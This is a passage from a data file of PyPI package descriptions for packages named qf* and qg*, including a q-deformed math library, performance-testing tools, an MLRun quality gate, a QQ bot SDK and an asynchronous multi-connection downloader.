analysisTTCF: time to cash flowsTTM: time to maturityTVM: time value of moneyUDF: user defined functionURL: universe resource locatorVaR: value at riskVar: varianceVB: Visual Basic (by Microsoft)VBA: Visual Basic for ApplicationsVol: volatilityWAC: weighted-average couponWAM: weighted-average maturityWP: Wiener process (aka Brownian motion)YC: yield curveYld: yieldZCB: zero coupon bond"} +{"package": "qfsclient", "pacakge-description": "No description available on PyPI."} +{"package": "qft", "pacakge-description": "# Toolkit for Lattice QFT## FeaturesHMC implemented with jax autodifferentiation"} +{"package": "qftiful", "pacakge-description": "QFT Beautiful"} +{"package": "qftify", "pacakge-description": "Python package for QFT Calculation"} +{"package": "qftplib", "pacakge-description": "# qftplib"} +{"package": "qfunction", "pacakge-description": "QfunctionLibrary for researcher with statistics and mechanics equation non-extensive \ud83d\udcc8\ud83d\udcca\ud83d\udcdaNon-extensive worksThis package is for development and works using the deformed non-extensive algebra, using for calculus, the simple algebra and the specials functions from quantum mechanics and theoretical physic, on the non-extensive mode.The all functions and equation on this work, is based in the articles and papers fromDr. Bruno G. da Costa, your friend, thePhD Ign\u00e1cio S. Gomesand others peoples and articles about the non-extensive works.Installation:this lib is found on the site of packages for python thepypiand on the site that is a repository for the codes and softwares with licenses from majority business of the word, thegithub.Linux$pipinstallqfunction-UWindowsC\\:> py -m pip install qfunction -UExamplesfundamentalssimple algebrafromqfunction.fundamentals.canonicimportprodfromqfunction.fundamentalsimportq_sum,q_mult,q_ln,q_sub#the sum deformed on q=1print(q_sum(4,2,1,q=1))#output: 6#the sum deformed on q=1.9print(q_sum(4,2,1,q=1.9))#output: -0.200000000000351#the multiplication deformed on q=1print(q_mult(1,2,q=1))#output: 2#the multiplication deformed on q=.8print(q_mult(1,2,q=.8))#output: 1.9999999999999998#the natural logarithm on q=1print(q_ln(3,q=1))#output: 1.0984848484848484#the natural logarithm deformed on q=.5print(q_ln(3,q=.5))#output: 1.4641016151377162print(q_sub(4,3,q=.9))Quantumcreating a quantum circuit basefromqfunction.quantumimportQuantumCircuitasQcq=1.qc=Qc(4,q=q)qc.Y(2)qc.H(2,1)qc.med(2)#print(qc)any equationsfromqfunction.quantum.equationsimportS,S_qfromqfunction.fundamentalsimportq_cos,q_sinfromnumpyimportarray,linspace,pit=array([1,2,34,56,34,23])p=t/t.sum()#print(p)#print(S(p))t=linspace(-2,2,100)*2*pitheta=t/2gamma=tq=1## testing the entropy deformed ##print(S_q(theta,gamma,q))q=.5print(S_q(theta,gamma,q))q=1.5print(S_q(theta,gamma,q))Algorithmsone simlpe example of code game on quantum circuit deformedfromqfunction.quantumimportQuantumCircuitasQcfromqfunction.quantum.algorithmsimportArenaGameq=.9qc=Qc(1,q=q)game=ArenaGame(qc=qc)game.up()game.left()game.left()game.show()Others Examples on colab."} +{"package": "qfunctions", "pacakge-description": "Uma simples biblioteca com fun\u00e7\u00f5es deformadasfun\u00e7\u00f5es especiais para trabalho com q-deformado usado para analise de sistesmas complexos"} +{"package": "qfunk", "pacakge-description": "No description available on PyPI."} +{"package": "qfx-scraper", "pacakge-description": "# QFX ScraperA simple scrapper for [https://qfxcinemas.com](https://qfxcinemas.com) site.## UsageInstall the `qfx-scraper` package by running:```bashpipenv install qfx-scraper```Now you can test the scraper.```python>>> from qfx import QFXScraper>>> scraper = QFXScraper()>>> scraper.get_movies()[, , , , , , , , , , , , , , , ]>>> # let's see now showing>>> scraper.showing[, , , , , , , , ]>>> # similarly, coming soon>>> scraper.coming_up[, , , , , , ]```"} +{"package": "qg-aio-eureka", "pacakge-description": "# python \u8fde\u63a5 EUREKA\u66f4\u65b0\u65f6\u95f4\uff1a2019-06-12\n\u7248\u672c\uff1aV0.1.2\n\u66f4\u65b0\u5185\u5bb9\u53ca\u72b6\u6001\uff1a[x] \u65b0\u589e\u540c\u6b65\u83b7\u53d6app\u63a5\u53e3"} +{"package": "qgate-graph", "pacakge-description": "QGate-GraphThe QGate graph generates graphical outputs based on performance tests (QGate Perf). Key benefits:provide graphs about Performance/Throughput and Response time (on typically client side)provide graphs about Executors in timeThese graphs only visualize outputs from performance tests, it is not replacement of\ndetail views from Grafana, Prometheus, etc. in detail of CPU, GPU, RAM, I/O etc. on side of testing system.Usagefromqgate_graph.graph_performanceimportGraphPerformancefromqgate_graph.graph_executorimportGraphExecutorimportlogging# setup login levellogging.basicConfig()logging.getLogger().setLevel(logging.INFO)# generate performance/throughput graphsgraph=GraphPerformance()graph.generate_from_dir()# generate excutors in time graphsgraph=GraphExecutor()graph.generate_from_dir()OutputsPerformance/Throughput & Response timeExecutors in time"} +{"package": "qgate-perf", "pacakge-description": "QGate-PerfThe QGate Performance is enabler for performance test execution. Key benefits:easy performance testingyour python code (key parts - init, start, stop, return)measure only specific partof your codescalabilitywithout limits(e.g. from 1 to 1k executors)scalabilityin level of processes and threads(easy way, how to avoid GIL in python)sequences for execution and data bulkrelation to graph generatorUsagefromqgate_perf.parallel_executorimportParallelExecutorfromqgate_perf.parallel_probeimportParallelProbefromqgate_perf.run_setupimportRunSetupimporttimedefprf_GIL_impact(run_setup:RunSetup):\"\"\" Your own function for performance testing, you have to addonly part INIT, START, STOP and RETURN\"\"\"# INIT - contain executor synchonization, if neededprobe=ParallelProbe(run_setup)while(True):# START - probe, only for this specific code partprobe.start()forrinrange(run_setup.bulk_row*run_setup.bulk_col):time.sleep(0)# STOP - probeifprobe.stop():break# RETURN - data from probereturnprobe# Execution settinggenerator=ParallelExecutor(prf_GIL_impact,label=\"GIL_impact\",detail_output=True,output_file=\"prf_gil_impact_01.txt\")# Run setup, with test execution 20 seconds and zero delay before start# (without waiting to other executors)setup=RunSetup(duration_second=20,start_delay=0)# Run performance test with:# data bulk_list with two data sets# - first has 10 rows and 5 columns as [10, 5]# - second has 1000 rows and 50 columns as [1000, 50]# executor_list with six executor sets# - first line has three executors with 2, 4 and 8 processes each with 2 threads# - second line has three executors with 2, 4 and 8 processes each with 4 threadsgenerator.run_bulk_executor(bulk_list=[[10,5],[1000,50]],executor_list=[[2,2,'2x thread'],[4,2,'2x thread'],[8,2,'2x thread'],[2,4,'4x thread'],[4,4,'4x thread'],[8,4,'4x thread']],run_setup=setup)# Note: We made 12 performance tests (two bulk_list x six executor_list) and write# outputs to the file 'prf_gil_impact_01.txt'# We generate performance graph based on performance tests to the# directory './output/graph-perf/*' (two files each for different bundle)generator.create_graph_perf()Outputs in text file############### 2023-05-05 06:30:36.194849 ###############\n{\"type\": \"headr\", \"label\": \"GIL_impact\", \"bulk\": [1, 1], \"available_cpu\": 12, \"now\": \"2023-05-05 06:30:36.194849\"}\n {\"type\": \"core\", \"plan_executors\": 4, \"plan_executors_detail\": [4, 1], \"real_executors\": 4, \"group\": \"1x thread\", \"total_calls\": 7590439, \"avrg_time\": 1.4127372338382197e-06, \"std_deviation\": 3.699171006877347e-05, \"total_call_per_sec\": 2831382.8673804617, \"endexec\": \"2023-05-05 06:30:44.544829\"}\n {\"type\": \"core\", \"plan_executors\": 8, \"plan_executors_detail\": [8, 1], \"real_executors\": 8, \"group\": \"1x thread\", \"total_calls\": 11081697, \"avrg_time\": 1.789265660825848e-06, \"std_deviation\": 4.164309967620533e-05, \"total_call_per_sec\": 4471107.994274894, \"endexec\": \"2023-05-05 06:30:52.623666\"}\n {\"type\": \"core\", \"plan_executors\": 16, \"plan_executors_detail\": [16, 1], \"real_executors\": 16, \"group\": \"1x thread\", \"total_calls\": 8677305, \"avrg_time\": 6.2560950624827455e-06, \"std_deviation\": 8.629422798757681e-05, \"total_call_per_sec\": 2557505.8946835063, \"endexec\": \"2023-05-05 06:31:02.875799\"}\n {\"type\": \"core\", \"plan_executors\": 8, \"plan_executors_detail\": [4, 2], \"real_executors\": 8, \"group\": \"2x threads\", \"total_calls\": 2761851, \"avrg_time\": 1.1906723084757647e-05, \"std_deviation\": 0.00010741937495211329, \"total_call_per_sec\": 671889.3135459893, \"endexec\": \"2023-05-05 06:31:10.283786\"}\n {\"type\": \"core\", \"plan_executors\": 16, \"plan_executors_detail\": [8, 2], \"real_executors\": 16, \"group\": \"2x threads\", \"total_calls\": 3605920, \"avrg_time\": 1.858694254439209e-05, \"std_deviation\": 0.00013301637613377212, \"total_call_per_sec\": 860819.3607844017, \"endexec\": \"2023-05-05 06:31:18.740831\"}\n {\"type\": \"core\", \"plan_executors\": 16, \"plan_executors_detail\": [4, 4], \"real_executors\": 16, \"group\": \"4x threads\", \"total_calls\": 1647508, \"avrg_time\": 4.475957498576462e-05, \"std_deviation\": 0.00020608402170105327, \"total_call_per_sec\": 357465.41393855185, \"endexec\": \"2023-05-05 06:31:26.008649\"}\n############### Duration: 49.9 seconds ###############Outputs in text file with detail############### 2023-05-05 07:01:18.571700 ###############\n{\"type\": \"headr\", \"label\": \"GIL_impact\", \"bulk\": [1, 1], \"available_cpu\": 12, \"now\": \"2023-05-05 07:01:18.571700\"}\n {\"type\": \"detail\", \"processid\": 12252, \"calls\": 1896412, \"total\": 2.6009109020233154, \"avrg\": 1.371490426143325e-06, \"min\": 0.0, \"max\": 0.0012514591217041016, \"st-dev\": 3.6488665183545995e-05, \"initexec\": \"2023-05-05 07:01:21.370528\", \"startexec\": \"2023-05-05 07:01:21.370528\", \"endexec\": \"2023-05-05 07:01:26.371062\"}\n {\"type\": \"detail\", \"processid\": 8944, \"calls\": 1855611, \"total\": 2.5979537963867188, \"avrg\": 1.4000530264084008e-06, \"min\": 0.0, \"max\": 0.001207590103149414, \"st-dev\": 3.6889275786419565e-05, \"initexec\": \"2023-05-05 07:01:21.466496\", \"startexec\": \"2023-05-05 07:01:21.466496\", \"endexec\": \"2023-05-05 07:01:26.466551\"}\n {\"type\": \"detail\", \"processid\": 2108, \"calls\": 1943549, \"total\": 2.6283881664276123, \"avrg\": 1.3523652691172758e-06, \"min\": 0.0, \"max\": 0.0012514591217041016, \"st-dev\": 3.624462003401045e-05, \"initexec\": \"2023-05-05 07:01:21.709203\", \"startexec\": \"2023-05-05 07:01:21.709203\", \"endexec\": \"2023-05-05 07:01:26.709298\"}\n {\"type\": \"detail\", \"processid\": 19292, \"calls\": 1973664, \"total\": 2.6392557621002197, \"avrg\": 1.3372366127670262e-06, \"min\": 0.0, \"max\": 0.0041027069091796875, \"st-dev\": 3.620965943471147e-05, \"initexec\": \"2023-05-05 07:01:21.840541\", \"startexec\": \"2023-05-05 07:01:21.840541\", \"endexec\": \"2023-05-05 07:01:26.841266\"}\n {\"type\": \"core\", \"plan_executors\": 4, \"plan_executors_detail\": [4, 1], \"real_executors\": 4, \"group\": \"1x thread\", \"total_calls\": 7669236, \"avrg_time\": 1.3652863336090071e-06, \"std_deviation\": 3.645805510967187e-05, \"total_call_per_sec\": 2929788.3539391863, \"endexec\": \"2023-05-05 07:01:26.891144\"}\n ...Graphs generated from qgate-graph based on outputs from qgate-perf512 executors (128 processes x 4 threads)32 executors (8 processes x 4 threads)"} +{"package": "qgates", "pacakge-description": "QGatescreated by Austin PoorA small package with some helper functions and quantum gates represented as numpy matrices.GitHub:https://github.com/a-poor/QGatesPyPi:https://pypi.org/project/qgatesRead the Docs:https://qgates.readthedocs.ioRequirementsPython 3NumpyInstallationpipinstallqgates"} +{"package": "qgate-sln-mlrun", "pacakge-description": "QGate-Sln-MLRunThe Quality Gate for solution MLRun (and Iguazio). The main aims of the project are:independent quality test (function, integration, acceptance, ... tests)deeper quality checks before full rollout/use in company environmentsidentification of possible compatibility issues (if any)external and independent test coverageetc.The tests use these key components, MLRun solution seeGIT mlrun,\nsample meta-data model seeGIT qgate-modeland this project.Test scenariosThe quality gate covers these test scenarios (\u2705 done, \u274c in-progress/planned):Project\u2705 TS101: Create project(s)\u2705 TS102: Delete project(s)Feature set\u2705 TS201: Create feature set(s)Ingest data\u2705 TS301: Ingest data to feature set(s)Feature vector\u2705 TS401: Create feature vector(s)Get data\u2705 TS501: Get data from off-line feature vector(s)\u2705 TS502: Get data from on-line feature vector(s)Build model\u2705 TS601: Build CART model\u274c TS602: Build XGBoost model\u274c TS603: Build DNN modelServe model\u2705 TS701: Serving score from CART\u274c TS702: Serving score from XGBoost\u274c TS703: Serving score from DNNNOTE: Each test scenario contains addition specific test cases.Test sourcesThe quality gate tests these sources (\u2705 done, \u274c in-progress/planned):Off-line\u2705 ParquetTarget, \u2705 CSVTargetOn-line\u2705 RedisTarget, \u274c SQLTarget, \u274c KafkaTarget\u274c SQLSourceOther\u2705 Pandas DataFrame (as Source)Sample of outputsThe reports in original form, see:all DONE -HTML,TXTwith ERR -HTML,TXTUsageYou can easy use this solution in four steps:Download content of these two GIT repositories to your local environmentqgate-sln-mlrunqgate-modelUpdate fileqgate-sln-mlrun.envfrom qgate-modelUpdate variables for MLRun/Iguazio, seeMLRUN_DBPATH,V3IO_USERNAME,V3IO_ACCESS_KEY,V3IO_APIsetting ofV3IO_*is needed only in case of Iguazio installation (not for pure free MLRun)Update variables for QGate, seeQGATE_*(basic description directly in *.env)detail setupconfigurationRun fromqgate-sln-mlrunpython main.pySee outputs'./output/qgt-mlrun-*.html''./output/qgt-mlrun-*.txt'Precondition: You have available MLRun or Iguazio solution (MLRun is part of that),\nsee officialinstallation steps, or directly installation forDesktop Docker.Tested withThe project was tested with these MLRun versions (seechange log):MLRun(in Desktop Docker)MLRun 1.5.2, 1.5.1, 1.5.0MLRun 1.4.1MLRun 1.3.0Iguazio(k8s, on-prem with VM with VMware)Iguazio 3.5.3 (with MLRun 1.4.1)Iguazio 3.5.1 (with MLRun 1.3.0)NOTE: Current state, only the last MLRun/Iguazio versions are valid for testing.TODO listThe list of expected/future improvementssee"} +{"package": "qg-botsdk", "pacakge-description": "\u5f15\u8a00\u5bf9\u4e8e\u4f7f\u7528python\u8fdb\u884c\u9891\u9053\u5b98\u65b9\u673a\u5668\u4eba\u5f00\u53d1\u800c\u8a00\uff0c\u5e02\u9762\u4e0a\u786e\u5b9e\u6709\u4e0d\u540c\u7684sdk\u53ef\u4ee5\u9009\u7528\uff0c\u4f46\u5176\u5f88\u591a\u53ea\u63d0\u4f9b\u5f02\u6b65asyncio+\u7c7b\u7ee7\u627f\u7684\u5f00\u53d1\u65b9\u5f0f\uff0c\u5bf9\u4e8e\u4e0d\u4f1a\u76f8\u5173\u6280\u5de7\u7684\u670b\u53cb\u4eec\uff0c\u5c24\u5176\u65b0\u624b\uff0c\u4f1a\u6709\u5f00\u53d1\u96be\u5ea6\u3002\u4e3a\u6b64\uff0cqg_botsdk\u76f8\u5e94\u63d0\u4f9b\u4e86\u53e6\u4e00\u4e2a\u9009\u62e9\uff0c\u8fd9\u4e00\u6b3esdk\u867d\u7136\u540c\u6837\u4f7f\u7528asyncio\u7f16\u5199sdk\u5e95\u5c42\uff0c\u4f46\u5176\u540c\u65f6\u63d0\u4f9b\u4e86threading\u548casyncio\u5c01\u88c5\u4e0b\u7684\u5e94\u7528\u5c42\u8c03\u7528\uff0c\u4ee5\u62bd\u8c61\u5316\u5c01\u88c5\u7684\u5e93\u7f16\u5199\u65b9\u5f0f\uff0c\u6781\u5927\u5730\u964d\u4f4e\u5e94\u7528\u5c42\u7684\u5f00\u53d1\u96be\u5ea6\u3002\u4eae\u70b9\u4e24\u79cd\u5e94\u7528\u5c42\u5f00\u53d1\u65b9\u5f0f\uff08threading\u3001asyncio\uff09\uff0c\u53ef\u6839\u636e\u81ea\u5df1\u7684\u559c\u597d\u9009\u62e9\uff0c\u800c\u5e95\u5c42\u5747\u4e3aasyncio\u5b9e\u73b0\uff0c\u4fdd\u6301\u9ad8\u5e76\u53d1\u80fd\u529b\u7075\u6d3b\u7684\u6784\u5efa\u65b9\u5f0f\uff0c\u5373\u4f7f\u5b98\u65b9\u5220\u9664\u6216\u65b0\u589e\u5b57\u6bb5\uff0cSDK\u4e5f\u4e0d\u4f1a\u89c4\u8303\u4e8e\u539f\u6765\u7684\u6570\u636e\u683c\u5f0f\uff0c\u800c\u4f1a\u628a\u771f\u5b9e\u6570\u636e\u53cd\u9988\u7ed9\u4f60\u8f7b\u91cf\uff0c\u7b80\u6d01\uff0c\u7edf\u4e00\u7684\u4ee3\u7801\u7ed3\u6784\uff0c\u901a\u8fc7\u5f55\u5165\u56de\u8c03\u51fd\u6570\u5904\u7406\u4e0d\u540c\u4e8b\u4ef6\uff0c10\u884c\u5373\u53ef\u6784\u5efa\u4e00\u4e2a\u7b80\u5355\u7684\u7a0b\u5e8f\u5bb9\u6613\u5165\u95e8\uff0c\u65e0\u9700\u5b66\u4f1aasyncio\u3001\u7c7b\u7ee7\u627f\u7b49\u7f16\u7a0b\u6280\u5de7\u4e5f\u53ef\u4f7f\u7528\uff0c\u540c\u65f6\u4fdd\u7559\u8f83\u9ad8\u5e76\u53d1\u80fd\u529b\u4fdd\u7559\u5b98\u65b9http API\u4e2dJson\u6570\u636e\u7684\u7ed3\u6784\u5b57\u6bb5\uff0c\u5e26\u4f60\u5b66\u4e60\u5b98\u65b9\u7ed3\u6784\uff0c\u65e5\u540e\u53ef\u81ea\u884c\u5f00\u53d1\u9002\u5408\u81ea\u5df1\u7684SDK\u7b80\u5355\u6613\u7528\u7684plugins\u7f16\u5199\u4e0e\u52a0\u8f7d\uff0c\u4f7f\u7528\u4f8b\u5b50\u53ef\u53c2\u9605example_13(\u88c5\u9970\u5668).py\u65b9\u4fbf\u591a\u573a\u666f\uff08\u9891\u9053+\u7fa4\u7b49\uff09\u6784\u5efa\u673a\u5668\u4eba\u7684\u62bd\u8c61\u5316\u5c01\u88c5\uff0c\u4f7f\u7528\u4f8b\u5b50\u53ef\u53c2\u9605example_16(Q\u7fa4\u7b80\u5355\u5de5\u4f5c\u6d41).py\u4e0b\u8f7d\u65b9\u5f0f\u76f4\u63a5\u4e0b\u8f7d\u6700\u65b0release\uff0c\u653e\u5230\u9879\u76ee\u4e2d\u5373\u53efpip\u5b89\u88c5\uff08\u63a8\u8350\uff09\uff1apipinstallqg-botsdk\u6ce8\u610f\u662fqg-botsdk\uff08\u4e2d\u7ebf\uff09\uff0c\u4e0d\u662fqg_botsdk\uff08\u5e95\u7ebf\uff09\u4e00\u4e2a\u7b80\u5355\u7684\u5de5\u4f5c\u6d41- \u6ce8\u518cBOT\u5b9e\u4f8b\uff0c\u5f55\u5165\u673a\u5668\u4eba\u5e73\u53f0\u83b7\u53d6\u7684ID\uff08BotAppId\u5f00\u53d1\u8005ID\uff09\u548ctoken\uff08\u673a\u5668\u4eba\u4ee4\u724c\uff09- \u7f16\u5199\u63a5\u6536\u4e8b\u4ef6\u7684\u51fd\u6570->\u4e0b\u65b9\u4f8b\u5b50\uff1adef deliver(data)\uff0c\u5e76\u53ef\u501f\u52a9model\u5e93\u68c0\u67e5\u6570\u636e\u683c\u5f0f\uff08data: Model.MESSAGE\uff09- \u7ed1\u5b9a\u63a5\u6536\u4e8b\u4ef6\u7684\u51fd\u6570\uff08bind_msg\u3001bind_dm\u3001bind_msg_delete\u3001bind_guild_event\u3001bind_guild_member\u3001bind_reaction\u3001bind_interaction\u3001bind_audit\u3001bind_forum\u3001bind_audio\uff09- \u5f00\u59cb\u8fd0\u884c\u673a\u5668\u4eba\uff1abot.start()fromqg_botsdkimportBOT,Model# \u5bfc\u5165SDK\u6838\u5fc3\u7c7b\uff08BOT\uff09\u3001\u6240\u6709\u6570\u636e\u6a21\u578b\uff08Model\uff09bot=BOT(bot_id='xxx',bot_token='xxx',is_private=True,is_sandbox=True)# \u5b9e\u4f8b\u5316SDK\u6838\u5fc3\u7c7b@bot.bind_msg()# \u7ed1\u5b9a\u63a5\u6536\u6d88\u606f\u4e8b\u4ef6\u7684\u51fd\u6570defdeliver(data:Model.MESSAGE):# \u521b\u5efa\u63a5\u6536\u6d88\u606f\u4e8b\u4ef6\u7684\u51fd\u6570if'\u4f60\u597d'indata.treated_msg:# \u5224\u65ad\u6d88\u606f\u662f\u5426\u5b58\u5728\u7279\u5b9a\u5185\u5bb9data.reply('\u4f60\u597d\uff0c\u4e16\u754c')# \u53d1\u9001\u88ab\u52a8\u56de\u590d\uff08\u5e26message_id\u76f4\u63a5reply\u56de\u590d\uff09# \u5982\u9700\u4f7f\u7528\u5982 Embed \u7b49\u6d88\u606f\u6a21\u677f\uff0c\u53ef\u4f20\u5165\u76f8\u5e94\u7ed3\u6784\u4f53\uff0c \u5982\uff1a# data.reply(ApiModel.MessageEmbed(title=\"\u4f60\u597d\", content=\"\u4e16\u754c\"))if__name__=='__main__':bot.start()# \u5f00\u59cb\u8fd0\u884c\u673a\u5668\u4eba\u5df2\u5b9e\u73b0\u4e8b\u4ef6\u63a5\u6536\uff08\u5df2\u652f\u6301\u89e3\u6790\u8bba\u575b\u4e8b\u4ef6\uff09from qg_botsdk.model import Model\n\u6b64\u5e93\u4e3a\u6240\u6709\u4e8b\u4ef6\u7684\u6570\u636e\u683c\u5f0f\u7ed3\u6784\uff0c\u53ef\u5957\u7528\u5230\u4ee3\u7801\u4ee5\u68c0\u67e5\u7ed3\u6784\u662f\u5426\u6b63\u786ebind_msgbind_dmbind_msg_deletebind_guild_eventbind_guild_memberbind_reactionbind_interactionbind_auditbind_forumbind_audio\u5df2\u5b9e\u73b0API- API\u5df2\u57fa\u672c\u5b8c\u5584\uff0c\u5177\u4f53\u8be6\u60c5\u53ef\u67e5\u9605\uff1ahttps://qg-botsdk.readthedocs.io/zh_CN/latest/API.html\n- \u5173\u4e8eAPI\u7684\u66f4\u591a\u8be6\u7ec6\u4fe1\u606f\u53ef\u9605\u8bfb\u5b98\u65b9\u6587\u6863\u4ecb\u7ecd\uff1ahttps://bot.q.qq.com/wiki/develop/api/get_bot_idget_bot_infoget_bot_guildsget_guild_infoget_guild_channelsget_channels_infocreate_channelspatch_channelsdelete_channelsget_guild_membersget_role_membersget_member_infodelete_memberget_guild_rolescreate_rolepatch_roledelete_rolecreate_role_memberdelete_role_memberget_channel_member_permissionput_channel_member_permissionget_channel_role_permissionput_channel_role_permissionget_message_infosend_msgsend_embed\uff08\u5df2\u5e9f\u5f03\uff09send_ark_23\uff08\u5df2\u5e9f\u5f03\uff09send_ark_24\uff08\u5df2\u5e9f\u5f03\uff09send_ark_37\uff08\u5df2\u5e9f\u5f03\uff09send_markdown\uff08\u5df2\u5e9f\u5f03\uff09delete_msgget_guild_settingcreate_dm_guildsend_dmdelete_dm_msgmute_all_membermute_membermute_memberscreate_announcedelete_announcecreate_pinmsgdelete_pinmsgget_pinmsgget_schedulesget_schedule_infocreate_schedulepatch_scheduledelete_schedulecreate_reactiondelete_reactionget_reaction_userscontrol_audiobot_on_micbot_off_micget_threadsget_thread_infocreate_threaddelete_threadget_guild_permissionscreate_permission_demandupload_mediasend_qq_dmsend_group_msg\u7279\u6b8a\u529f\u80fdregister_start_event\uff1a\u7ed1\u5b9a\u4e00\u4e2a\u5728\u673a\u5668\u4eba\u5f00\u59cb\u8fd0\u884c\u540e\u9a6c\u4e0a\u6267\u884c\u7684\u51fd\u6570register_repeat_event\uff1a\u7ed1\u5b9a\u4e00\u4e2a\u80cc\u666f\u91cd\u590d\u8fd0\u884c\u7684\u51fd\u6570security_check\uff1a\u7528\u4e8e\u4f7f\u7528\u817e\u8baf\u5185\u5bb9\u68c0\u6d4b\u63a5\u53e3\u8fdb\u884c\u5185\u5bb9\u68c0\u6d4b\u76f8\u5173\u94fe\u63a5\u6587\u6863\uff1areadthedocs\u5b98\u65b9\u6ce8\u518c\u673a\u5668\u4eba\uff1ahttps://q.qq.com/#/\u5b98\u65b9API\u6587\u6863\uff1ahttps://bot.q.qq.com/wiki/develop/api/SDK QQ\u4ea4\u6d41\u7fa4\uff1ahttps://jq.qq.com/?_wv=1027&k=3NnWvGpz"} +{"package": "qg-common-sdk", "pacakge-description": "\u5e95\u5c42\u5c01\u88c5\u5de5\u5177\u7c7b\u5f02\u5e38\u5904\u7406\u81ea\u5b9a\u4e49\u5f02\u5e38\u4fe1\u606f\ncatchException.py# \u4e1a\u52a1\u5f02\u5e38\u7c7b\u5c01\u88c5\nclass BusinessException(Exception):\n def __init__(self, data: str,msg: str):\n self.data = data\n self.code = StatusCode.BUSINESSEXEC\n self.msg = msg\n# \u5f02\u5e38\u5c01\u88c5\u7c7b\nclass SysException(Exception):\n def __init__(self, data: str,msg: str):\n self.data = data\n self.code = StatusCode.SYSEXEC\n self.msg = msg\u9700\u8981\u5f02\u5e38\u5904\u7406\u7684\u63a5\u53e3\u4e0a\uff0c\u6dfb\u52a0exec_catch_func\u88c5\u9970\u5668\u5373\u53ef\u3002\u8fd4\u56de\u503c\u4fe1\u606f\u7edf\u4e00\u5c01\u88c5returnInfo.py\n\u6bcf\u4e2a\u9700\u8981\u7edf\u4e00\u8fd4\u56de\u503c\u7684\u63a5\u53e3\u4e0a\uff0c\u6dfb\u52a0return_info_func\u88c5\u9970\u5668\u5373\u53ef\u3002\nreturn_info_func \u4e2d\u5c01\u88c5\u4e86\u5f02\u5e38\u5904\u7406\uff0c\u5f02\u5e38\u65e5\u5fd7\u8bb0\u5f55\uff0c\u64cd\u4f5c\u65e5\u5fd7\u8bb0\u5f55\u7b49\u5b57\u5178\u7edf\u4e00\u5904\u7406dictOpr.py\n\u5b57\u5178\u7edf\u4e00\u5904\u7406\u7c7b\uff0c\u652f\u6301\u5185\u5b58\u7f13\u5b58\uff0c\u63d0\u4f9b\u5b57\u5178\u67e5\u8be2\uff0c\u6e05\u9664\u7f13\u5b58\u63a5\u53e3\uff0c\u672a\u6765\u53ef\u4ee5\u652f\u6301redis\u7f13\u5b58\u3002\u83b7\u53d6\u7528\u6237\u4fe1\u606foperUserInfo.py\n\u63d0\u4f9b\u63a5\u53e3\u4eceredis\u4e2d\u83b7\u53d6\u5f53\u524d\u7528\u6237\u4fe1\u606f\u65f6\u95f4\u8f6c\u6362\u5de5\u5177dateTool.py \u65f6\u95f4\u8f6c\u6362\u5de5\u5177\u7cfb\u7edf\u5de5\u5177sysTool.py \u64cd\u4f5c\u7cfb\u7edf\u53c2\u6570\u7684\u51fd\u6570\u5c01\u88c5"} +{"package": "qg.core", "pacakge-description": "[![](https://api.travis-ci.org/QunarOPS/qg.core.png?branch=master)](https://travis-ci.org/QunarOPS/qg.core)\nquickgears.core\n===============\u4e00\u5806\u5de5\u5177"} +{"package": "qg.db", "pacakge-description": "[![](https://api.travis-ci.org/QunarOPS/qg.db.png?branch=master)](https://travis-ci.org/QunarOPS/qg.db)Quick Gear Database===============\u6570\u636e\u64cd\u4f5c\u5c01\u88c5"} +{"package": "qgel", "pacakge-description": "A quick way to use the qgel embedding"} +{"package": "qgen", "pacakge-description": "Generate a random value of questions based on a template"} +{"package": "qgeneration", "pacakge-description": "Data generation libraryInstallation$pipinstallqgenerationTesting$pythonsetup.pytestLicensingThe code in this project is licensed under MIT license."} +{"package": "qgepqwat2ili", "pacakge-description": "No description available on PyPI."} +{"package": "qget", "pacakge-description": "qgetis an Apache2 licensed library, written in Python, for downloading web\nresources in asynchronous manner as fast as possible.Under the hood it benefits fromasyncioandaiohttpto create multiple\nsimultaneous connections to resource and download it using buffered part files.Table of ContentsFeaturesMotivation:wgetvsqgetRequirementsInstallationBuildUsagePython codeProgress hooksCommand lineNotesLimiterPart sizeHistory0.1.7 (2023-05-15)0.1.6 (2023-05-15)0.1.5 (2023-01-25)0.1.4 (2022-08-25)0.1.1 (2022-06-09)0.0.8 (2022-06-04)0.0.6 (2022-05-31)0.0.1 (2022-05-31)Featuresan executable script to download file via command linesupport for HTTPS connection with basic auth and SSL verification skipsupport for custom headersautomatic measurement of simultaneous connections limitsupport for limiting download ratesupport for retries during part downloadingsupport for downloading / rewriting progress with callbacks (by default usingtqdm)support for limiting RAM usage with settingschunk_bytesandmax_part_mbsupport for using own event loop inasynciobyqget_corocoroutinesupport for SOCKS4(a), SOCKS5(h), HTTP (tunneling) proxyMotivation:wgetvsqgetConsider simplenginxconfiguration fragment like this:http{server{...limit_rate5m;...}}Now let\u2019s compare download statistics forwgetandqgetfor1000MBfile and configuration\nmentioned above:ApplicationTotal time [s]AVG Speed [MB/s]Detailswget251.343.98qget16.0095.97Connection limit test: 5.00sDownload: 10.42sParts rewrite: 0.58sConclusion:For simple rate limiting (per connection)qgetallows to achievemultiple times fasterdownload speed\nbased on user internet connection speed, number of simultaneous requests and resource server configuration.\nIn example aboveqgetachieved over24xdownload speed ofwget.For more complicated cases (e.g. connections limit per IP) automatic connection limit measurement test was\ncreated to calculate how many simultaneous requests could be achieved before server rejects next one.RequirementsPython>= 3.7aiohttpaiofilesaiohttp-sockstqdmInstallationYou can download selected binary files fromReleases.\nAvailable versions:Windows 32-bit (qget-0.1.7-win32.exe)Windows 64-bit (qget-0.1.7-win_amd64.exe)POSIX 32-bit (qget-0.1.7-i386)POSIX 64-bit (qget-0.1.7-amd64)To installqgetmodule, simply:$pipinstallqgetBuildMake sureAnacondais installed.To build onWindows(in Anaconda Prompt):$build.batTo build onPOSIX(libc-binandbinutilspackages are required):$build.shUsagePython codeFunction arguments:url (str): The URL to download the resource.\nfilepath (str, optional): Output path for downloaded resource.\n If not set it points to current working directory and filename from url. Defaults to None.\noverride (bool, optional): Flag if existing output file should be override. Defaults to False.\nauth (str, optional): String of user:password pair for SSL connection. Defaults to None.\nverify_ssl (bool, optional): Flag if SSL certificate validation should be performed. Defaults to True.\nmock_browser (bool, optional): Flag if User-Agent header should be added to request. Defaults to True.\n Default User-Agent string: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\n (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36'\nproxy_url (str, optional): HTTP/SOCKS4/SOCKS5 proxy url in format 'protocol://user:password@ip:port'.\n Defaults to None.\nheaders: (Dict[str, str], optional): Custom headers to be sent. Default to None.\n If set user can specify own User-Agent and Accept headers, otherwise defaults will be 